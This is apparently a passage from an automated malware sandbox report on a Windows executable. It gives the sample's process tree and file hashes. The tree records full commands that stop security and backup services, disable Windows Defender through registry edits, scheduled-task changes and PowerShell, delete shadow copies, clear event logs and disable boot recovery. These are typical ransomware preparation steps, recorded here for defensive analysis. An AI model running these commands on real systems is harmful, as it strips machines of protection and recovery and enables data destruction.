585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2328 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2328 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2300 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2300 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2932 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2932 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2020 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2020 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2316 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2316 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 3156 wrote to memory of 2992 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 2992 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 3060 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 3060 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 2280 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 2280 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 964 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 964 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 2416 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe PID 3156 wrote to memory of 2416 3156 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:1328
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:3272
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2320
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2736
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3704
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:3208
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:3996
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:2804
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_12bf5" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_12bf5" /y3⤵PID:1240
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:368
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1912
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:980
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1260
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2328
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:2300
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:2932
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:2020
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_12bf5" start= disabled2⤵PID:2316
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2992
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3060
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2280
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:964
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:2416
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:2088
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:3256
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:584
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3192
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3468
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1312
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3576
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1244
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1972
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2848
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1784
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:1660
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3748
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2420
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3048
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:64
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3972
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:912
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2072
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1164 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1724 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2356 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2324
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2468
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1004
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1356
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:836 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3284
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3080 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3908 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1144 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3176 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3236 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2832 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3200 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1272 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1232
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1148 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:724 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
MD5
b20ce0aea4d379371a3057dc65310567
SHA1b2d3ced7b30c638258f3e45e72d06f779ecc804e
SHA2569865603a0003e532b51847db5050253697f1f15b1c9b12735a5e1f1356129199
SHA512a8548294d02825e154fc089512e81674a1733992bac8f795027e57ee933efa5be6f2612deb1a99505934c66ea154f598d20c732ff91ea470aed2b9c5b44a81b9